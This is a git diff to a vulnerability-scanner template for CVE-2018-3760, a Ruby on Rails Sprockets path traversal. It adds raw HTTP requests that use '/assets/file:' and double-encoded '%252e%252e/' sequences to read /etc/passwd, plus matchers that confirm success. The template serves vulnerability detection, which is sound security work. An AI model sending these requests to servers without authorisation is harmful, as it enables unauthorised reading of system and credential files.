diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index 779c5ee4ec..ff39f6696f 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -1,22 +1,46 @@ id: CVE-2018-3760 info: - name: Rails CVE-2018-3760 - author: 0xrudra + name: Ruby On Rails Path Traversal + author: 0xrudra,pikpikcu severity: high + reference: | + - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 + - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf + - https://seclists.org/oss-sec/2018/q2/210 + - https://xz.aliyun.com/t/2542 + description: | + Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. + There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. tags: cve,cve2018,rails,lfi requests: - - method: GET - path: - - "{{BaseURL}}/assets/file:%2f%2f/etc/passwd" + - raw: + - | + GET /assets/file:%2f%2f/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 94 + + - | + GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + + extractors: + - type: regex + name: path + internal: true + part: body + regex: + - "/etc/passwd is no longer under a load path: (.*?)," matchers-condition: and matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status status: - 200 - - type: regex - regex: - - "root:[x*]:0:0:" - part: body